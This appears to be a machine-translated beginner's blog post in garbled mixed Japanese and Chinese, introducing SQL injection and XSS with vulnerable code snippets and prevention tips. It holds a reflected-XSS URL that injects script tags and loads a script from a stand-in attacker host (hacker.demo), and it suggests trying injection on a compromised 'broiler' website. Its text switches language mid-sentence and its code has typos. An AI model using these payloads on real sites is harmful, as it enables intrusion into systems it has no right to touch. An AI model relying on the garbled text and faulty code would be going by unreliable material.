コンピューターの初心者として、私は常にハッカーは素晴らしいと思っているので、この否定的な知識情報セキュリティを理解してください。
ハッカーは英語の翻訳であり、ハッカーとして翻訳されています。コンピュータをハッキングまたはハッキングする方法はたくさんあり、主に2つのタイプに分けられます。
(1)非破坏性的攻击:一般是为了扰乱系统的运行,并不盗窃系统资料,仅仅只是使服务器暂时失去对外提供服务的能力,通常采用拒绝服务攻击或信息炸弹
(2)破坏性攻击:是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的
一般的な攻撃には、DDOS、CSRF、Dosなどがあります。通常の方法は、ウイルス、フラッド、およびシステムの脆弱性です。
ここにいくつかの簡単な紹介があります
SQLインジェクション
常见的注入式攻击,通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句リンク記述
の追加SQLインジェクションを実行できる本質的な理由は、コードとデータが厳密に分離されていないため、ユーザーがデータを読み取るときにコードの一部として誤ってデータを実行する原因となるためです。
簡単な例を次に示します。
var testCondition;
testCondition = Request.from("testCondition")
var sql ="select * from TableA where id='"+ testCondition +"'";
上記の例では、ユーザーが入力したIDが数字だけの場合はもちろん問題ありませんが、「;」で区切ってtestConditionに他のSQLステートメントを挿入すると、予期しない結果が表示されます。たとえば、input drop 、削除など。たとえば、誤って「#–!#@」のような文字を入力して保存すると、データベースが更新され、場所の背後にある情報がコメントアウトされ、実行ステートメントは次のようになります。
updata table set memo=""# --! #(@" where use_id=xxxxxxx;
データだけでなく、データベース全体のメモフィールドのデータが更新されるようにします。
ここに詳細に書いた数人の兄弟がいます、あなたは行くことができます
(1)最も詳細なSQLインジェクションチュートリアル-Yi Liwei
(2)ウェブの完全な記事のSQL
(3)SQLインジェクション攻撃
(4)ウェブサイトを壊すSQLインジェクション
ブロイラーのウェブサイトを見つけて試してみるか、自分でブロイラーのウェブサイトを書くのも良い選択です
。SQLインジェクションは非常に有害です。プログラムを設計する際に、次の側面からそれを防ぐことができます。
(1)过滤用户输入参数中的特殊字符,从而降低被SQL注入的风险
(2)禁止使用字符串拼接的SQL语句,严格使用参数绑定传入的SQL参数
(3)合理使用数据库访问框架提供的防注入机制
xss攻撃
XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets,CSS)
的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,
它允许恶意web用户将代码植入到提供给其它用户使用的页面中。即黑客通过技术手段向
正常用户请求的HTML页面中插入恶意脚本,从而可以执行任意脚本
xssの分類
(1)反射型XSS
恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来
实施攻击的。
(2)保存されたXSS
恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较
常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如某
CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员
查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的
XSS存储型攻击。
(3)DOMタイプXSS
其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。
たとえば、2011年のWeibo程度のXSSワーム攻撃では、攻撃者はWeibo公開機能を使用してアクションデータの脆弱性を効果的にフィルタリングせず、Weibo情報を公開するときに攻撃スクリプトを含むURLを設定し、ユーザーがアクセスしましたWeiboは悪意のあるスクリプトをロードすることに夢中になっており、ユーザーは自分のアカウントで同じWeiboを自動的に転送できます。このようなウイルスの拡散により、多数のユーザーが攻撃されています。
これは、反射型XSSのファイルになる可能性のある簡単な例です。
<div>
<h3>反射型XSS实例</h3>
<br>用户:<%=request.getParamer("useName")%>
<br>系统错误信息:<%=request.getParamer("errorMessage")%>
<div>
上記のコードは、HTTPリクエストからuserNameとerrorMessageの2つのパラメーターを取得し、それらをHTMLに直接出力して表示します。このようなURLを作成すると、リフレクティブXSSが表示され、ユーザーはスクリプトファイルを実行します。
http://xss.demo/self-xss.jsp?userName=666<script>alert("666")</script>
&errorMessage=XSS实例<script scr=http://hacker.demo/xss-script.js>
XSS攻撃の防止は、主に、jsonpフレームワークを使用してユーザー入力文字列をXSSフィルタリングしたり、SpingフレームワークのHtmlUtilsを使用してユーザー入力文字列をhtmlエスケープしたりするなど、ユーザー入力データをフィルタリングしてエスケープすることによって行われます。
ここではいくつかのより詳細なXSS攻撃のブログがある
(1)Webセキュリティ上のXSS攻撃は、
(2)XSSのクロスサイトスクリプティング攻撃は、
(3)XSSの防衛法
(4)はXSS攻撃の原則について話す。
時間は、次の時間で通過しています3番目のタイプのハッキングであるCSRFについて少し説明しましょう。